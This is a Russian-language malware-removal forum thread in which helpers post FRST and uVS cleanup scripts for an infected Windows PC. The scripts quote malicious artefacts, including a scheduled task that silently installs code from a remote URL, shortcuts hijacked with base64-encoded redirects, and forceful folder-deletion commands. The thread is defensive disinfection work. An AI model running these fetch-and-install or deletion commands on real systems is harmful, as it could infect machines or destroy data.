Пробовал. Не помогло!Для запуска рабочего стола сможет сработать комбинация Win+R с командой explorer
"Убил" один процес в диспетчере задач и рабочий стол запустился.А AdwCleaner? Безопасный режим с поддержкой сети?
start
CreateRestorePoint:
Hosts:
() C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\prot7283426f-3046-4086-8ed8-c538d3ea43f7.tmpfs
() C:\Windows\Temp\gD106.tmp.exe
() C:\Program Files (x86)\UCBrowser\Application\UCService.exe
() C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\knsB0A8.tmp
() C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\knsB0A8.tmp
() C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\UCAgent.exe
C:\Program Files (x86)\UCBrowser\
(IEC) C:\Program Files (x86)\BikaQRssReader\BikaQ.exe
C:\Program Files (x86)\BikaQRssReader\
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks]
HKLM\...\Providers\x9leisov: C:\Program Files (x86)\Sherset Community\local64spl.dll [308224 2017-02-20] ()
ShellExecuteHooks: No Name - {EE208D6E-F444-11E6-AF06-64006A5CFC23} - C:\Program Files (x86)\Erniedkfack\Atodersqtation.dll [146432 2017-02-20] ()
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\їмС№\X64\KZipShell.dll [2017-02-20] ()
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicy\User: Restriction <======= ATTENTION
R2 vutobowi; C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\knsB0A8.tmp [416768 2017-02-21] () [File not signed]
R2 gemeloki; C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244\prot7283426f-3046-4086-8ed8-c538d3ea43f7.tmpfs [X]
S2 serverss; C:\Windows\Temp\A21B.tmp [X]
U1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION
Task: {081F77CB-6B87-42A8-AEFC-DAEEC7783758} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== ATTENTION
Task: {4333E581-AB34-4C06-8DE2-5AC339C2B343} - System32\Tasks\4646I82I85L1330 => Rundll32.exe "C:\ProgramData\4646I82I85L1330\4646I82I85L1330.dll",IILUsWWZ <==== ATTENTION
Task: {523D330A-7CC3-4652-BEBB-3F7A87D5EA7F} - \{7F0F7E47-0C0C-0F7D-7D11-7E0A7D08117E} -> No File <==== ATTENTION
Task: {6A79DAD2-6B03-4EB3-827B-366C350ED8AA} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== ATTENTION
Task: {6E89844D-9E0F-4B49-9F24-B3C4545005BE} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-02-20] (UC Web Inc.) <==== ATTENTION
Task: {9F3ED6BC-BD70-40A7-8EDA-A19DE25C3DD4} - System32\Tasks\4646I82I85L1330-dll => Rundll32.exe "C:\ProgramData\4646I82I85L1330\4646I82I85L1330.dll",IILUsWWZ
Task: {B17BFF1B-30F5-4F2C-8AF2-6CEB4F802589} - System32\Tasks\Anuvtain => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=TOSHIBAXMQ01ABD075_4376F86FSXX4376F86FS&v=2017220 /q
WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
CMD: RD /S /Q %WinDir%\System32\GroupPolicyUsers
CMD: RD /S /Q %WinDir%\System32\GroupPolicy
CMD: RD /S /Q %WinDir%\SysWOW64\GroupPolicyUsers
CMD: RD /S /Q %WinDir%\SysWOW64\GroupPolicy
CMD: RD /S /Q %WinDir%\SysNative\GroupPolicyUsers
CMD: RD /S /Q %WinDir%\SysNative\GroupPolicy
CMD: gpupdate /force
EmptyTemp:
Reboot:
end
>>> [MASK] "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk" -> ["C:\Program Files (x86)\HPZebra\ZebraStarter.exe" =>> QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxJbnRlcm5ldCBFeHBsb3JlclxpZXhwbG9yZS5leGU= aHR0cDovL3Zvb2thZGlmZW50eS5ydS8=]
>>> [MASK] "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk" -> ["C:\Program Files (x86)\HPZebra\ZebraStarter.exe" =>> QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNb3ppbGxhIEZpcmVmb3hcZmlyZWZveC5leGU= aHR0cDovL3Zvb2thZGlmZW50eS5ydS8=]
>>> [MASK] "C:\Users\Public\Desktop\Моzillа Firеfох.lnk" -> ["C:\Program Files (x86)\HPZebra\ZebraStarter.exe" =>> QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNb3ppbGxhIEZpcmVmb3hcZmlyZWZveC5leGU= aHR0cDovL3Zvb2thZGlmZW50eS5ydS8=]
>>> [MASK] "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Моzillа Firеfох.lnk" -> ["C:\Program Files (x86)\HPZebra\ZebraStarter.exe" =>> QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNb3ppbGxhIEZpcmVmb3hcZmlyZWZveC5leGU= aHR0cDovL3Zvb2thZGlmZW50eS5ydS8=]
>>> [HTTP] "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk" -> ["C:\Program Files (x86)\Mozilla Firefox\firefox.exe" =>> hxxp://qtipr.com/]
>>> [HTTP] "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk" -> ["C:\Program Files\Internet Explorer\iexplore.exe" =>> hxxp://qtipr.com/]
BikaQ Rss Reader (HKLM-x32\...\{56B2B28A-E663-4D28-84A3-3846068A7D63}) (Version: 1.0.0 - BikaQ)
HPZebra (HKLM-x32\...\HPZebra) (Version: - ) <==== ATTENTION
setupsk (HKU\S-1-5-21-1982386886-4226071709-1876287043-1001\...\setupsk) (Version: - )
trotux - Uninstall (HKLM-x32\...\{96DA9D2E-9C42-4C2F-ACE2-8B3FC4B2106A}) (Version: - ) <==== ATTENTION
;uVS v3.87 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v385c
sreg
exec32 C:\Users\User\AppData\Local\A290AC89-1487696306-11E2-9673-CE39E79C8000\Uninstall.exe
exec32 "C:\Program Files (x86)\PubHotspot\unins000.exe"
exec32 MsiExec.exe /I{F59B0792-442A-467A-B788-6CB01D71A3E7}
dirzooex %SystemDrive%\PROGRAM FILES (X86)\PUBHOTSPOT
dirzooex %SystemRoot%\TEMP
zoo %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487696306-11E2-9673-CE39E79C8000\QNSL4287.TMP
dirzooex %SystemDrive%\PROGRAM FILES\TJ1DD8I6XU
dirzooex %SystemDrive%\PROGRAM FILES\V74XUHMFAL
delall %SystemDrive%\PROGRAM FILES (X86)\PUBHOTSPOT\CXH2MRQ3FC96OQP.EXE
delall %SystemRoot%\TEMP\G4E51.TMP.EXE
delall %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487696306-11E2-9673-CE39E79C8000\QNSL4287.TMP
delall %SystemDrive%\PROGRAM FILES\TJ1DD8I6XU\TJ1DD8I6X.EXE
delall %SystemDrive%\PROGRAM FILES\V74XUHMFAL\V74XUHMFA.EXE
delall %SystemDrive%\PROGRAMDATA\4646I82I85L1330\4646I82I85L1330.DLL
delall %SystemRoot%\TEMP\G492F.TMP
delall %Sys32%\DRIVERS\69076356.SYS
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:UCDRV-X64.SYS
delref HTTP://GO.MAIL.RU/DISTIB/EP/?PRODUCT_ID=%7BC5875683-749B-443B-B421-619BE15BEB8A%7D&GP=812254
zoo %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\KNS80DA.TMP
zoo %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\KNSB0A8.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\KNS80DA.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\KNSB0A8.TMP
zoo %SystemDrive%\PROGRAM FILES (X86)\SHERSET COMMUNITY\LOCAL64SPL.DLL
delall %SystemDrive%\PROGRAM FILES (X86)\SHERSET COMMUNITY\LOCAL64SPL.DLL
zoo %SystemDrive%\PROGRAM FILES (X86)\ERNIEDKFACK\MGLOBAL.DLL
zoo %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\PRO80EA.TMP
zoo %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\PROT7283426F-3046-4086-8ED8-C538D3EA43F7.TMPFS
zoo %SystemDrive%\PROGRAM FILES (X86)\PUBHOTSPOT\PUBLICHOTSPOT.EXE
zoo %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487687553-11E2-9673-CE39E79C8000\QNSFC037.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\PRO80EA.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\7283426F-3046-4086-8ED8-C538D3EA43F71487571244\PROT7283426F-3046-4086-8ED8-C538D3EA43F7.TMPFS
delall %SystemDrive%\PROGRAM FILES (X86)\PUBHOTSPOT\PUBLICHOTSPOT.EXE
delall %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487687553-11E2-9673-CE39E79C8000\QNSFC037.TMP
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X64
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X86
delall %SystemDrive%\PROGRAM FILES (X86)\BIKAQRSSREADER\BIKAQ.EXE
delall %SystemDrive%\USERS\USER\APPDATA\ROAMING\SETUPSK\PYTHON\PYTHONW.EXE
dirzooex %SystemDrive%\PROGRAM FILES (X86)\ERNIEDKFACK
delall %SystemDrive%\PROGRAM FILES (X86)\ERNIEDKFACK\ATODERSQTATION.DLL
delall %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO360.DLL
delall %SystemDrive%\PROGRAM FILES\MY WEB SHIELD\MWESHIELDUP.EXE
delall %SystemDrive%\PROGRAM FILES (X86)\VK OK ADBLOCK\IEEF\W0YBNT.EXE
delref KUAIZIP SHELL EXTENSION\[CLSID]
delall %Sys32%\DRIVERS:UCDRV-X64.SYS
delall %Sys32%\DRIVERS:X64
delall %Sys32%\DRIVERS:X86
delall %SystemDrive%\PROGRAM FILES (X86)\ERNIEDKFACK\MGLOBAL.DLL
areg
deltmp
czoo
restart
;uVS v3.87.9 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v388c
BREG
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY\UCLAUNCHER.EXE
bl 475F9188B279C0A7014394B98EB143BB 743824
addsgn BA6F9BB2BDFD44720B9C2D754C2120FBDA75303AC9A957FB69E38D3789E5B8B3369CBA523E1D1682D495FEE64316B6EF99A8ED721D5178962473A4EF8F85E653 8 UC Web
zoo %Sys32%\DRIVERS:X64
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X64
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY\UCLAUNCHER-X64.EXE
zoo %Sys32%\DRIVERS:UCDRV-X64.SYS
bl BC380DF77F023D410466676FA5A27E3C 50888
delall %Sys32%\DRIVERS:UCDRV-X64.SYS
zoo %Sys32%\DRIVERS:X86
bl BA052C285D77745342B6DDC6BE0873C3 607120
delall %Sys32%\DRIVERS:X86
zoo %SystemDrive%\PROGRAM FILES (X86)\MIO\MIO.EXE
bl 41E928AF129C0583D2EB8C13A6CAEE64 331368
delall %SystemDrive%\PROGRAM FILES (X86)\MIO\MIO.EXE
addsgn 1A26069A5583C58CF42B254E3143FE8E60825F4EDBB81F2546483AE9DB3A201ADC227B057C55625C4F30C59FCDE6C2BF755A2807433202292D77CE39998F129B 64 AdWare.Win32.ConvertAd.bbhf [Kaspersky]
zoo %SystemDrive%\USERS\USER\APPDATA\LOCAL\A290AC89-1487768701-11E2-9673-CE39E79C8000\QNSC2EB6.TMP
bl 542199EC8FAA7CB170B8F663D62ADA99 158720
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:UCDRV-X64.SYS
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:UCDRV-X64.SYS
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X86
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\SECURITY:X86
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\APPLICATION\UCSERVICE.EXE
bl 0B3D1E968E53563C0DD97F4B348FBA7E 597208
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\APPLICATION\UCSERVICE.EXE
zoo %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\APPLICATION\UPDATE_TASK.EXE
bl AB85F66781614C444A165F6420972736 483032
delall %SystemDrive%\PROGRAM FILES (X86)\UCBROWSER\APPLICATION\UPDATE_TASK.EXE
delall %SystemDrive%\PROGRAMDATA\4646I82I85L1330\4646I82I85L1330.DLL
chklst
delvir
czoo
restart
Файлы quarantine.zip и/или virusinfo_cure.zip (другие недопустимы)Полученный архив отправьте с помощью этой формы
на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @)
start
CreateRestorePoint:
FF Keyword.URL: Mozilla\Firefox\Profiles\uzqjs7p7.default ->
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\uzqjs7p7.default\searchplugins\087yviit.xml [2017-02-21]
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\uzqjs7p7.default\searchplugins\x9leisov.xml [2017-02-20]
CHR HKLM-x32\...\Chrome\Extension: [lkemddiljapcmhicklfpcbpfffahfbja] - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\extensions\WebNavigation.crx [2014-09-18]
R2 WinSnare; C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll [779264 2017-02-22] (InterSect Alliance Pty Ltd) [File not signed]
C:\Users\User\AppData\Roaming\WinSnare\
R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== ATTENTION
C:\Program Files (x86)\UCBrowser\
2017-02-22 12:59 - 2017-02-22 16:46 - 00000000 ____D C:\Program Files (x86)\MIO
2017-02-22 12:59 - 2017-02-22 14:04 - 00000000 ____D C:\Program Files (x86)\BikaQRssReader
2017-02-22 12:59 - 2017-02-22 12:59 - 00000000 ____D C:\Users\User\AppData\Roaming\WinSnare
2017-02-22 12:59 - 2017-02-22 12:59 - 00000000 ____D C:\Users\User\AppData\Roaming\WinSAPSvc
2017-02-22 12:59 - 2017-02-22 12:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BikaQ
2017-02-22 12:59 - 2017-02-22 12:59 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.1.4)
2017-02-22 12:58 - 2017-02-22 12:58 - 00000000 ____D C:\Program Files (x86)\087yviit
2017-02-22 09:54 - 2017-02-22 09:54 - 00000000 ____D C:\Users\User\AppData\Roaming\Reazowardlaqule
2017-02-22 09:54 - 2017-02-22 09:54 - 00000000 ____D C:\Users\User\AppData\Roaming\Pilertain
2017-02-21 16:58 - 2017-02-22 14:06 - 00000000 ____D C:\Program Files (x86)\Ghabuty
2017-02-21 16:58 - 2017-02-22 14:03 - 00000000 ____D C:\Program Files\V74XUHMFAL
2017-02-21 16:58 - 2017-02-22 14:03 - 00000000 ____D C:\Program Files\TJ1DD8I6XU
2017-02-21 16:58 - 2017-02-22 14:02 - 00000000 ____D C:\Program Files (x86)\PubHotspot
2017-02-21 16:58 - 2017-02-21 16:58 - 00006056 _____ C:\Windows\System32\Tasks\Biveingcoerpy Mapper
2017-02-21 16:58 - 2017-02-21 16:58 - 00000000 ____D C:\Users\User\AppData\Local\Reecik
2017-02-21 16:58 - 2017-02-21 16:58 - 00000000 ____D C:\Program Files (x86)\Biveingcoerpy Mapper
2017-02-21 16:30 - 2017-02-22 11:40 - 00000000 ____D C:\Users\User\AppData\Roaming\KuaiZip
2017-02-21 14:32 - 2017-02-22 14:04 - 00000000 ____D C:\Users\User\AppData\Local\A290AC89-1487687553-11E2-9673-CE39E79C8000
2017-02-20 08:26 - 2017-02-20 08:26 - 00000853 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\їмС№.lnk
2017-02-20 08:26 - 2017-02-20 08:26 - 00000000 ____D C:\Program Files\їмС№
2017-02-20 08:18 - 2017-02-20 08:18 - 00000000 ____D C:\Users\User\AppData\Local\UCBrowser
2017-02-20 08:18 - 2017-02-20 08:18 - 00000000 ____D C:\Program Files (x86)\Maoha
2017-02-20 08:16 - 2017-02-20 08:16 - 01906859 _____ C:\Users\User\AppData\Roaming\MoveLotex.tst
2017-02-20 08:15 - 2017-02-20 08:15 - 00278518 _____ C:\Users\User\AppData\Roaming\Reex.bin
2017-02-20 08:14 - 2017-02-20 21:22 - 00000000 ____D C:\Program Files (x86)\xxx
2017-02-20 08:13 - 2017-02-22 14:04 - 00000000 ____D C:\Program Files (x86)\7283426f-3046-4086-8ed8-c538d3ea43f71487571244
2017-02-20 07:56 - 2017-02-22 14:04 - 00000000 ____D C:\Program Files (x86)\Sherset Community
2017-02-20 07:56 - 2017-02-20 07:56 - 00006000 _____ C:\Windows\System32\Tasks\Sherset Community
2017-02-20 07:55 - 2017-02-22 14:06 - 00000000 ____D C:\Program Files (x86)\Erniedkfack
2017-02-20 07:55 - 2017-02-20 07:56 - 00000000 ____D C:\Users\User\AppData\Local\Anibeent
2017-02-19 17:09 - 2017-02-22 14:06 - 00000000 ___HD C:\Users\Все пользователи\4646I82I85L1330
2017-02-19 17:09 - 2017-02-22 14:06 - 00000000 ___HD C:\ProgramData\4646I82I85L1330
2017-02-19 17:09 - 2017-02-19 17:09 - 01662464 _____ (Microsoft Corporation) C:\Windows\csrss.exe
2017-02-19 17:09 - 2017-02-19 17:09 - 00364088 _____ (NVIDIA Corporation) C:\Windows\cudart64_80.dll
2017-02-19 17:09 - 2017-02-19 17:09 - 00278016 _____ (The cURL library, hxxp://curl.haxx.se/) C:\Windows\libcurl.dll
2017-02-19 17:09 - 2017-02-19 17:09 - 00177152 _____ C:\Windows\svchost.exe
2017-02-19 17:09 - 2017-02-19 17:09 - 00021504 _____ C:\Windows\OpenCL.dll
2017-02-19 17:08 - 2017-02-19 17:08 - 00073216 _____ C:\Windows\taskmgr.exe
C:\Windows\svchost.exe
ATTENTION ====> Check for partition/boot infection.
Task: {129734AE-8887-46E4-8A0C-D1B86BAD134F} - \setupsk -> No File <==== ATTENTION
Task: {156404EB-EA74-47DD-B54E-79845916954C} - \UCBrowserSecureUpdater -> No File <==== ATTENTION
Task: {39FFB663-1C57-4291-9422-28ACD352BA34} - \BikaQ_FetchAndUpgrade_CanBeDel -> No File <==== ATTENTION
Task: {5BA2A482-08DA-47F4-A001-EF8BACF601A2} - System32\Tasks\Sherset Community => C:\Program Files (x86)\Erniedkfack\grikery.exe [2017-02-20] (Glarysoft Ltd)
Task: {771BF1D5-9E3D-4B60-960F-7599C3196EA0} - \4646I82I85L1330 -> No File <==== ATTENTION
Task: {A069D5F9-E687-4795-A0B8-0450F357C872} - \clearlnk -> No File <==== ATTENTION
Task: {A420BA93-981F-4D1F-A22F-B196C036A6EB} - System32\Tasks\Biveingcoerpy Mapper => C:\Program Files (x86)\Ghabuty\marck.exe [2017-02-21] (Glarysoft Ltd)
Task: {BB9C887F-6D3C-4B06-893E-21ED823DB7AA} - \4646I82I85L1330-dll -> No File <==== ATTENTION
Task: {DAEC6D7A-21CE-4EA0-A50F-0DE652DB3DD1} - \Milimili -> No File <==== ATTENTION
Task: {EC5BCA6F-4D70-4B7B-B795-D8BE08AC4383} - \setupsk2 -> No File <==== ATTENTION
Task: {F3F37FFA-C4F5-40B5-896E-64D2AFDB1A7B} - \marck -> No File <==== ATTENTION
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\їмС№.lnk -> C:\Program Files\їмС№\X86\KuaiZip.exe () <===== Cyrillic
2017-02-20 08:26 - 2017-02-20 08:26 - 00524696 _____ () C:\Program Files\їмС№\X64\KZipShell.dll
EmptyTemp:
Reboot:
end
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?